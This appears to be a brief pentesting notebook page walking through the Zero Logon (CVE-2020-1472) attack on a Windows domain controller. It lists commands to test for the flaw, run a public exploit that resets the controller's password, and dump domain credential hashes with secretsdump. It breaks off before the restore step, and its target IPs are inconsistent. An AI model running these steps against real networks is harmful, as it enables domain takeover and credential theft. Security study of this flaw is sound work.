<aside> đź“Ś Summary
</aside>
<aside> ⚠️ This exploit might destroy an environment, please use it carefully
</aside>
Zero Logon is a critical vulnerability in Microsoft's Netlogon protocol that allows attackers to bypass the authentication process for Windows domain controllers. Exploiting this vulnerability enables an attacker to impersonate the domain controller and gain administrative access to the entire network.
First we want to verify if our target is vulnerable, to do so we can use https://github.com/SecuraBV/CVE-2020-1472.
python3 zeologon_test.py ORB-DC 10.0.0.12
If our target is vulnerable we can now use https://github.com/dirkjanm/CVE-2020-1472 to abuse Netlogon protocol
python3 cve-2020-1472-exploit.py ORB-DC 10.0.0.2
Then we can freely connect on the target without passwords like on this example. In this case we use \\$ to signal that there’s no password
secretsdump.py -just-dc ORB/ORB-DC\\[email protected]
To restore the password we’ll need the administrator hash as well as the plain_password_hex
For the first one we can use the result of the previous command
